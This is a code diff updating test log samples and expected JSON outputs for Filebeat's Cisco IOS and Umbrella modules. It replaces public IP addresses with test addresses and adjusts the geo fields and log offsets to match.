index f606b5249ed6..8b6c3188a7d2 100644
--- a/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log-expected.json
+++ b/x-pack/filebeat/module/cisco/ios/test/cisco-ios-syslog.log-expected.json
@@ -327,13 +327,6 @@
         "cisco.ios.access_list": "150",
         "cisco.ios.facility": "SEC",
         "destination.address": "172.217.10.46",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.10.46",
         "destination.port": 80,
         "event.category": [
@@ -825,13 +818,6 @@
         "cisco.ios.access_list": "150",
         "cisco.ios.facility": "SEC",
         "destination.address": "172.217.10.46",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.10.46",
         "destination.port": 80,
         "event.category": [
@@ -1020,13 +1006,6 @@
         "cisco.ios.access_list": "150",
         "cisco.ios.facility": "SEC",
         "destination.address": "172.217.10.46",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.10.46",
         "destination.port": 80,
         "event.category": [
@@ -1120,15 +1099,16 @@
     {
         "cisco.ios.access_list": "177",
         "cisco.ios.facility": "SEC",
-        "destination.address": "8.8.8.8",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.geo.city_name": "Changchun",
+        "destination.geo.continent_name": "Asia",
+        "destination.geo.country_iso_code": "CN",
+        "destination.geo.country_name": "China",
+        "destination.geo.location.lat": 43.88,
+        "destination.geo.location.lon": 125.3228,
+        "destination.geo.region_iso_code": "CN-22",
+        "destination.geo.region_name": "Jilin Sheng",
+        "destination.ip": "175.16.199.1",
         "destination.port": 53,
         "event.category": [
             "network",
@@ -1138,7 +1118,7 @@
         "event.dataset": "cisco.ios",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "Jun 20 02:43:20 198.51.100.2 1663323: Jun 20 02:43:20.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(59415) -> 8.8.8.8(53), 1 packet",
+        "event.original": "Jun 20 02:43:20 198.51.100.2 1663323: Jun 20 02:43:20.346: %SEC-6-IPACCESSLOGP: list 177 denied udp 198.51.100.195(59415) -> 175.16.199.1(53), 1 packet",
         "event.outcome": "deny",
         "event.sequence": 1663323,
         "event.severity": 6,
@@ -1152,14 +1132,14 @@
         "log.level": "informational",
         "log.offset": 3696,
         "log.source.address": "198.51.100.2",
-        "message": "list 177 denied udp 198.51.100.195(59415) -> 8.8.8.8(53), 1 packet",
-        "network.community_id": "1:h/uFabgjBwU5mrrtpdTxxrh73yI=",
+        "message": "list 177 denied udp 198.51.100.195(59415) -> 175.16.199.1(53), 1 packet",
+        "network.community_id": "1:6L/2xZjl1dnrNbgNmPYhxb9SVmQ=",
         "network.packets": 1,
         "network.transport": "udp",
         "network.type": "ipv4",
         "related.ip": [
-            "198.51.100.195",
-            "8.8.8.8"
+            "175.16.199.1",
+            "198.51.100.195"
         ],
         "service.type": "cisco",
         "source.address": "198.51.100.195",
@@ -1185,7 +1165,7 @@
         "event.dataset": "cisco.ios",
         "event.kind": "event",
         "event.module": "cisco",
-        "event.original": "Jun 20 02:43:22 198.51.100.2 1663324: Jun 20 02:43:21.348: %SEC-6-IPACCESSLOGP: list 177 denied udp 8.8.8.8(53) -> 198.51.100.195(59415), 1 packet",
+        "event.original": "Jun 20 02:43:22 198.51.100.2 1663324: Jun 20 02:43:21.348: %SEC-6-IPACCESSLOGP: list 177 denied udp 175.16.199.1(53) -> 198.51.100.195(59415), 1 packet",
         "event.outcome": "deny",
         "event.sequence": 1663324,
         "event.severity": 6,
@@ -1197,27 +1177,28 @@
         "fileset.name": "ios",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 3843,
+        "log.offset": 3848,
         "log.source.address": "198.51.100.2",
-        "message": "list 177 denied udp 8.8.8.8(53) -> 198.51.100.195(59415), 1 packet",
-        "network.community_id": "1:h/uFabgjBwU5mrrtpdTxxrh73yI=",
+        "message": "list 177 denied udp 175.16.199.1(53) -> 198.51.100.195(59415), 1 packet",
+        "network.community_id": "1:6L/2xZjl1dnrNbgNmPYhxb9SVmQ=",
         "network.packets": 1,
         "network.transport": "udp",
         "network.type": "ipv4",
         "related.ip": [
-            "198.51.100.195",
-            "8.8.8.8"
+            "175.16.199.1",
+            "198.51.100.195"
         ],
         "service.type": "cisco",
-        "source.address": "8.8.8.8",
-        "source.as.number": 15169,
-        "source.as.organization.name": "Google LLC",
-        "source.geo.continent_name": "North America",
-        "source.geo.country_iso_code": "US",
-        "source.geo.country_name": "United States",
-        "source.geo.location.lat": 37.751,
-        "source.geo.location.lon": -97.822,
-        "source.ip": "8.8.8.8",
+        "source.address": "175.16.199.1",
+        "source.geo.city_name": "Changchun",
+        "source.geo.continent_name": "Asia",
+        "source.geo.country_iso_code": "CN",
+        "source.geo.country_name": "China",
+        "source.geo.location.lat": 43.88,
+        "source.geo.location.lon": 125.3228,
+        "source.geo.region_iso_code": "CN-22",
+        "source.geo.region_name": "Jilin Sheng",
+        "source.ip": "175.16.199.1",
         "source.packets": 1,
         "source.port": 53,
         "tags": [
@@ -1237,7 +1218,7 @@
         "fileset.name": "ios",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 3990,
+        "log.offset": 4000,
         "log.source.address": "198.51.100.2",
         "message": "access-list logging rate-limited or missed 23 packets",
         "service.type": "cisco",
@@ -1273,7 +1254,7 @@
         "icmp.type": "3",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4125,
+        "log.offset": 4135,
         "log.source.address": "198.51.100.2",
         "message": "list 150 denied icmp 198.51.100.12 -> 198.51.100.1 (3/3), 32 packets",
         "network.community_id": "1:huj4hjTG/rbN+R5GhpV6YHP1sYM=",
@@ -1297,13 +1278,6 @@
         "cisco.ios.access_list": "150",
         "cisco.ios.facility": "SEC",
         "destination.address": "172.217.10.46",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.10.46",
         "destination.port": 80,
         "event.category": [
@@ -1326,7 +1300,7 @@
         "fileset.name": "ios",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4275,
+        "log.offset": 4285,
         "log.source.address": "198.51.100.2",
         "message": "list 150 denied tcp 198.51.100.12(59834) -> 172.217.10.46(80), 1 packet",
         "network.community_id": "1:5enMmUgQViWG28IC5W6/9cYJ6EA=",
@@ -1373,7 +1347,7 @@
         "fileset.name": "ios",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4427,
+        "log.offset": 4437,
         "log.source.address": "198.51.100.2",
         "message": "list 177 denied udp 198.51.100.195(54532) -> 198.51.100.255(15600), 1 packet",
         "network.community_id": "1:HW2UVF4QjZyP0WvOCPDC/SaLeM4=",
@@ -1420,7 +1394,7 @@
         "fileset.name": "ios",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4584,
+        "log.offset": 4594,
         "log.source.address": "198.51.100.2",
         "message": "list 177 denied udp 198.51.100.195(57831) -> 198.51.100.255(15600), 1 packet",
         "network.community_id": "1:wnyoad/xLJtzSkYMtkPdjPFtcbY=",
@@ -1467,7 +1441,7 @@
         "fileset.name": "ios",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4741,
+        "log.offset": 4751,
         "log.source.address": "198.51.100.2",
         "message": "list 150 denied udp 198.51.100.20(138) -> 198.51.100.255(138), 1 packet",
         "network.community_id": "1:20RnUEbnGL+QfL5tp+byZIdFKiE=",
@@ -1514,7 +1488,7 @@
         "fileset.name": "ios",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 4893,
+        "log.offset": 4903,
         "log.source.address": "198.51.100.2",
         "message": "list 177 denied udp 198.51.100.195(42988) -> 198.51.100.255(15600), 1 packet",
         "network.community_id": "1:+vR7H9Spa/zExAcx4hOFskroCOY=",
@@ -1539,13 +1513,6 @@
         "cisco.ios.access_list": "150",
         "cisco.ios.facility": "SEC",
         "destination.address": "172.217.10.46",
-        "destination.as.number": 15169,
-        "destination.as.organization.name": "Google LLC",
-        "destination.geo.continent_name": "North America",
-        "destination.geo.country_iso_code": "US",
-        "destination.geo.country_name": "United States",
-        "destination.geo.location.lat": 37.751,
-        "destination.geo.location.lon": -97.822,
         "destination.ip": "172.217.10.46",
         "destination.port": 80,
         "event.category": [
@@ -1568,7 +1535,7 @@
         "fileset.name": "ios",
         "input.type": "log",
         "log.level": "informational",
-        "log.offset": 5050,
+        "log.offset": 5060,
         "log.source.address": "198.51.100.2",
         "message": "list 150 denied tcp 198.51.100.12(59836) -> 172.217.10.46(80), 1 packet",
         "network.community_id": "1:cfXjAByFKHEuSoPPIRx01/7LC0Q=",
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log
index f776f71c60db..f88c691e6c80 100644
--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log
@@ -1,3 +1,3 @@
-"2020-07-23 23:49:54","elasticuser","elasticuser2","some other identity","192.168.1.1","8.8.8.8","Allowed","1 (A)","NOERROR","elastic.co.","Software/Technology,Business Services,Application","Test Policy Name","SomeIdentityType",""
+"2020-07-23 23:49:54","elasticuser","elasticuser2","some other identity","192.168.1.1","175.16.199.1","Allowed","1 (A)","NOERROR","elastic.co.","Software/Technology,Business Services,Application","Test Policy Name","SomeIdentityType",""
 "2020-07-23 23:50:25","elasticuser","elasticuser2","some other identity","192.168.1.1","4.4.4.4","Blocked","1 (A)","NOERROR","elastic.co/something.","Chat,Instant Messaging,Block List,Application","Test Policy Name","SomeIdentityType","BlockedCategories"
-"2021-05-14 19:39:58","elastic_machine","elastic_machine,Elastic User (ElasticUser@elastic.co)","1.1.1.1","2.2.2.2","Allowed","1 (A)","NOERROR","elastic.co.","Infrastructure","Roaming Computers","Roaming Computers,AD Users",""
+"2021-05-14 19:39:58","elastic_machine","elastic_machine,Elastic User (ElasticUser@elastic.co)","89.160.20.156","2.2.2.2","Allowed","1 (A)","NOERROR","elastic.co.","Infrastructure","Roaming Computers","Roaming Computers,AD Users",""
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log-expected.json b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log-expected.json
index 0d49c1443565..6833ac5cd8f7 100644
--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log-expected.json
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-dnslogs.log-expected.json
@@ -14,18 +14,18 @@
         "dns.question.type": "Allowed",
         "dns.response_code": "1 (A)",
         "dns.type": "query",
-        "event.action": "dns-request-8.8.8.8",
+        "event.action": "dns-request-175.16.199.1",
         "event.category": "network",
         "event.dataset": "cisco.umbrella",
         "event.module": "cisco",
-        "event.original": "\\\"2020-07-23 23:49:54\\\",\\\"elasticuser\\\",\\\"elasticuser2\\\",\\\"some other identity\\\",\\\"192.168.1.1\\\",\\\"8.8.8.8\\\",\\\"Allowed\\\",\\\"1 (A)\\\",\\\"NOERROR\\\",\\\"elastic.co.\\\",\\\"Software/Technology,Business Services,Application\\\",\\\"Test Policy Name\\\",\\\"SomeIdentityType\\\",\\\"\\\"",
+        "event.original": "\\\"2020-07-23 23:49:54\\\",\\\"elasticuser\\\",\\\"elasticuser2\\\",\\\"some other identity\\\",\\\"192.168.1.1\\\",\\\"175.16.199.1\\\",\\\"Allowed\\\",\\\"1 (A)\\\",\\\"NOERROR\\\",\\\"elastic.co.\\\",\\\"Software/Technology,Business Services,Application\\\",\\\"Test Policy Name\\\",\\\"SomeIdentityType\\\",\\\"\\\"",
         "event.type": [
             "connection"
         ],
         "fileset.name": "umbrella",
         "input.type": "log",
         "log.offset": 0,
-        "message": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2\",\"some other identity\",\"192.168.1.1\",\"8.8.8.8\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"",
+        "message": "\"2020-07-23 23:49:54\",\"elasticuser\",\"elasticuser2\",\"some other identity\",\"192.168.1.1\",\"175.16.199.1\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Software/Technology,Business Services,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"\"",
         "observer.product": "Umbrella",
         "observer.type": "dns",
         "observer.vendor": "Cisco",
@@ -69,7 +69,7 @@
         ],
         "fileset.name": "umbrella",
         "input.type": "log",
-        "log.offset": 232,
+        "log.offset": 237,
         "message": "\"2020-07-23 23:50:25\",\"elasticuser\",\"elasticuser2\",\"some other identity\",\"192.168.1.1\",\"4.4.4.4\",\"Blocked\",\"1 (A)\",\"NOERROR\",\"elastic.co/something.\",\"Chat,Instant Messaging,Block List,Application\",\"Test Policy Name\",\"SomeIdentityType\",\"BlockedCategories\"",
         "observer.product": "Umbrella",
         "observer.type": "dns",
@@ -108,15 +108,15 @@
         "event.category": "network",
         "event.dataset": "cisco.umbrella",
         "event.module": "cisco",
-        "event.original": "\\\"2021-05-14 19:39:58\\\",\\\"elastic_machine\\\",\\\"elastic_machine,Elastic User (ElasticUser@elastic.co)\\\",\\\"1.1.1.1\\\",\\\"2.2.2.2\\\",\\\"Allowed\\\",\\\"1 (A)\\\",\\\"NOERROR\\\",\\\"elastic.co.\\\",\\\"Infrastructure\\\",\\\"Roaming Computers\\\",\\\"Roaming Computers,AD Users\\\",\\\"\\\"",
+        "event.original": "\\\"2021-05-14 19:39:58\\\",\\\"elastic_machine\\\",\\\"elastic_machine,Elastic User (ElasticUser@elastic.co)\\\",\\\"89.160.20.156\\\",\\\"2.2.2.2\\\",\\\"Allowed\\\",\\\"1 (A)\\\",\\\"NOERROR\\\",\\\"elastic.co.\\\",\\\"Infrastructure\\\",\\\"Roaming Computers\\\",\\\"Roaming Computers,AD Users\\\",\\\"\\\"",
         "event.type": [
             "allowed",
             "connection"
         ],
         "fileset.name": "umbrella",
         "input.type": "log",
-        "log.offset": 487,
-        "message": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"1.1.1.1\",\"2.2.2.2\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"",
+        "log.offset": 492,
+        "message": "\"2021-05-14 19:39:58\",\"elastic_machine\",\"elastic_machine,Elastic User (ElasticUser@elastic.co)\",\"89.160.20.156\",\"2.2.2.2\",\"Allowed\",\"1 (A)\",\"NOERROR\",\"elastic.co.\",\"Infrastructure\",\"Roaming Computers\",\"Roaming Computers,AD Users\",\"\"",
         "observer.product": "Umbrella",
         "observer.type": "dns",
         "observer.vendor": "Cisco",
@@ -124,16 +124,16 @@
             "elastic.co."
         ],
         "related.ip": [
-            "1.1.1.1",
-            "2.2.2.2"
+            "2.2.2.2",
+            "89.160.20.156"
         ],
         "related.user": [
             "Elastic User (ElasticUser@elastic.co)",
             "elastic_machine"
         ],
         "service.type": "cisco",
-        "source.address": "1.1.1.1",
-        "source.ip": "1.1.1.1",
+        "source.address": "89.160.20.156",
+        "source.ip": "89.160.20.156",
         "source.user.name": "elastic_machine"
     }
 ]
\ No newline at end of file
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log
index 6200aeab3ae3..a58dc713face 100644
--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log
@@ -1,2 +1,2 @@
-"2020-08-26 20:32:46","elasticuser","192.168.1.1","0","8.8.8.8","0","Test Category"
-"2020-08-26 20:32:45","elasticuser","192.168.1.1","61095","8.8.8.8","445","Test Category"
+"2020-08-26 20:32:46","elasticuser","192.168.1.1","0","175.16.199.1","0","Test Category"
+"2020-08-26 20:32:45","elasticuser","192.168.1.1","61095","175.16.199.1","445","Test Category"
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log-expected.json b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log-expected.json
index 4d25464cb614..87e53f4aca06 100644
--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log-expected.json
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-iplogs.log-expected.json
@@ -2,22 +2,22 @@
     {
         "@timestamp": "2020-08-26T20:32:46.000Z",
         "cisco.umbrella.categories": "Test Category",
-        "destination.address": "8.8.8.8",
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.ip": "175.16.199.1",
         "destination.port": "0",
         "event.dataset": "cisco.umbrella",
         "event.module": "cisco",
-        "event.original": "\\\"2020-08-26 20:32:46\\\",\\\"elasticuser\\\",\\\"192.168.1.1\\\",\\\"0\\\",\\\"8.8.8.8\\\",\\\"0\\\",\\\"Test Category\\\"",
+        "event.original": "\\\"2020-08-26 20:32:46\\\",\\\"elasticuser\\\",\\\"192.168.1.1\\\",\\\"0\\\",\\\"175.16.199.1\\\",\\\"0\\\",\\\"Test Category\\\"",
         "fileset.name": "umbrella",
         "input.type": "log",
         "log.offset": 0,
-        "message": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"8.8.8.8\",\"0\",\"Test Category\"",
+        "message": "\"2020-08-26 20:32:46\",\"elasticuser\",\"192.168.1.1\",\"0\",\"175.16.199.1\",\"0\",\"Test Category\"",
         "observer.product": "Umbrella",
         "observer.type": "firewall",
         "observer.vendor": "Cisco",
         "related.ip": [
-            "192.168.1.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.1.1"
         ],
         "related.user": [
             "elasticuser"
@@ -31,22 +31,22 @@
     {
         "@timestamp": "2020-08-26T20:32:45.000Z",
         "cisco.umbrella.categories": "Test Category",
-        "destination.address": "8.8.8.8",
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.ip": "175.16.199.1",
         "destination.port": "445",
         "event.dataset": "cisco.umbrella",
         "event.module": "cisco",
-        "event.original": "\\\"2020-08-26 20:32:45\\\",\\\"elasticuser\\\",\\\"192.168.1.1\\\",\\\"61095\\\",\\\"8.8.8.8\\\",\\\"445\\\",\\\"Test Category\\\"",
+        "event.original": "\\\"2020-08-26 20:32:45\\\",\\\"elasticuser\\\",\\\"192.168.1.1\\\",\\\"61095\\\",\\\"175.16.199.1\\\",\\\"445\\\",\\\"Test Category\\\"",
         "fileset.name": "umbrella",
         "input.type": "log",
-        "log.offset": 84,
-        "message": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"8.8.8.8\",\"445\",\"Test Category\"",
+        "log.offset": 89,
+        "message": "\"2020-08-26 20:32:45\",\"elasticuser\",\"192.168.1.1\",\"61095\",\"175.16.199.1\",\"445\",\"Test Category\"",
         "observer.product": "Umbrella",
         "observer.type": "firewall",
         "observer.vendor": "Cisco",
         "related.ip": [
-            "192.168.1.1",
-            "8.8.8.8"
+            "175.16.199.1",
+            "192.168.1.1"
         ],
         "related.user": [
             "elasticuser"
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log
index bfe70c6839a8..623d55e899f9 100644
--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log
@@ -1,3 +1,3 @@
-"2020-07-23 23:48:56","elasticuser, someotheruser","192.168.1.1","1.1.1.1","8.8.8.8","","ALLOWED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
-"2020-07-23 23:48:56","elasticuser, someotheruser","192.168.1.1","1.1.1.1","8.8.8.8","","BLOCKED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
+"2020-07-23 23:48:56","elasticuser, someotheruser","192.168.1.1","89.160.20.156","175.16.199.1","","ALLOWED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
+"2020-07-23 23:48:56","elasticuser, someotheruser","192.168.1.1","89.160.20.156","175.16.199.1","","BLOCKED","https://elastic.co/blog/ext_id=Anyclip","https://google.com/elastic","Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36","200","850","","","","Business Services","AVDetectionName","Malicious","MalwareName","","","Roaming Computers",""
 "2017-10-02 23:52:53","elasticuser","ActiveDirectoryUserName,ADSite,Network","192.192.192.135","1.1.1.91","","ALLOWED","http://google.com/the.js","www.google.com","Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/61.0.3163.100 Safari/537.36","200","562","1489","","","","","","","","Networks"
diff --git a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log-expected.json b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log-expected.json
index 8a38e04731e0..ca887172a2b8 100644
--- a/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log-expected.json
+++ b/x-pack/filebeat/module/cisco/umbrella/test/umbrella-proxylogs.log-expected.json
@@ -7,11 +7,11 @@
         "cisco.umbrella.identities": "elasticuser, someotheruser",
         "cisco.umbrella.identity_types": "Roaming Computers",
         "cisco.umbrella.puas": "Malicious",
-        "destination.address": "8.8.8.8",
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.ip": "175.16.199.1",
         "event.dataset": "cisco.umbrella",
         "event.module": "cisco",
-        "event.original": "\\\"2020-07-23 23:48:56\\\",\\\"elasticuser, someotheruser\\\",\\\"192.168.1.1\\\",\\\"1.1.1.1\\\",\\\"8.8.8.8\\\",\\\"\\\",\\\"ALLOWED\\\",\\\"https://elastic.co/blog/ext_id=Anyclip\\\",\\\"https://google.com/elastic\\\",\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\\\",\\\"200\\\",\\\"850\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"Business Services\\\",\\\"AVDetectionName\\\",\\\"Malicious\\\",\\\"MalwareName\\\",\\\"\\\",\\\"\\\",\\\"Roaming Computers\\\",\\\"\\\"",
+        "event.original": "\\\"2020-07-23 23:48:56\\\",\\\"elasticuser, someotheruser\\\",\\\"192.168.1.1\\\",\\\"89.160.20.156\\\",\\\"175.16.199.1\\\",\\\"\\\",\\\"ALLOWED\\\",\\\"https://elastic.co/blog/ext_id=Anyclip\\\",\\\"https://google.com/elastic\\\",\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\\\",\\\"200\\\",\\\"850\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"Business Services\\\",\\\"AVDetectionName\\\",\\\"Malicious\\\",\\\"MalwareName\\\",\\\"\\\",\\\"\\\",\\\"Roaming Computers\\\",\\\"\\\"",
         "event.type": [
             "allowed"
         ],
@@ -21,19 +21,19 @@
         "http.response.status_code": "200",
         "input.type": "log",
         "log.offset": 0,
-        "message": "\"2020-07-23 23:48:56\",\"elasticuser, someotheruser\",\"192.168.1.1\",\"1.1.1.1\",\"8.8.8.8\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
+        "message": "\"2020-07-23 23:48:56\",\"elasticuser, someotheruser\",\"192.168.1.1\",\"89.160.20.156\",\"175.16.199.1\",\"\",\"ALLOWED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
         "observer.product": "Umbrella",
         "observer.type": "proxy",
         "observer.vendor": "Cisco",
         "related.ip": [
-            "1.1.1.1",
+            "175.16.199.1",
             "192.168.1.1",
-            "8.8.8.8"
+            "89.160.20.156"
         ],
         "service.type": "cisco",
         "source.address": "192.168.1.1",
         "source.ip": "192.168.1.1",
-        "source.nat.ip": "1.1.1.1",
+        "source.nat.ip": "89.160.20.156",
         "url.domain": "elastic.co",
         "url.original": "https://elastic.co/blog/ext_id=Anyclip",
         "url.path": "/blog/ext_id=Anyclip",
@@ -48,11 +48,11 @@
         "cisco.umbrella.identities": "elasticuser, someotheruser",
         "cisco.umbrella.identity_types": "Roaming Computers",
         "cisco.umbrella.puas": "Malicious",
-        "destination.address": "8.8.8.8",
-        "destination.ip": "8.8.8.8",
+        "destination.address": "175.16.199.1",
+        "destination.ip": "175.16.199.1",
         "event.dataset": "cisco.umbrella",
         "event.module": "cisco",
-        "event.original": "\\\"2020-07-23 23:48:56\\\",\\\"elasticuser, someotheruser\\\",\\\"192.168.1.1\\\",\\\"1.1.1.1\\\",\\\"8.8.8.8\\\",\\\"\\\",\\\"BLOCKED\\\",\\\"https://elastic.co/blog/ext_id=Anyclip\\\",\\\"https://google.com/elastic\\\",\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\\\",\\\"200\\\",\\\"850\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"Business Services\\\",\\\"AVDetectionName\\\",\\\"Malicious\\\",\\\"MalwareName\\\",\\\"\\\",\\\"\\\",\\\"Roaming Computers\\\",\\\"\\\"",
+        "event.original": "\\\"2020-07-23 23:48:56\\\",\\\"elasticuser, someotheruser\\\",\\\"192.168.1.1\\\",\\\"89.160.20.156\\\",\\\"175.16.199.1\\\",\\\"\\\",\\\"BLOCKED\\\",\\\"https://elastic.co/blog/ext_id=Anyclip\\\",\\\"https://google.com/elastic\\\",\\\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\\\",\\\"200\\\",\\\"850\\\",\\\"\\\",\\\"\\\",\\\"\\\",\\\"Business Services\\\",\\\"AVDetectionName\\\",\\\"Malicious\\\",\\\"MalwareName\\\",\\\"\\\",\\\"\\\",\\\"Roaming Computers\\\",\\\"\\\"",
         "event.type": [
             "denied"
         ],
@@ -61,20 +61,20 @@
         "http.request.referrer": "https://google.com/elastic",
         "http.response.status_code": "200",
         "input.type": "log",
-        "log.offset": 399,
-        "message": "\"2020-07-23 23:48:56\",\"elasticuser, someotheruser\",\"192.168.1.1\",\"1.1.1.1\",\"8.8.8.8\",\"\",\"BLOCKED\",\"https://elastic.co/blog/ext_id=Anyclip\",\"https://google.com/elastic\",\"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/84.0.4147.89 Safari/537.36\",\"200\",\"850\",\"\",\"\",\"\",\"Business Services\",\"AVDetectionName\",\"Malicious\",\"MalwareName\",\"\",\"\",\"Roaming Computers\",\"\"",
+        "log.offset": 410,
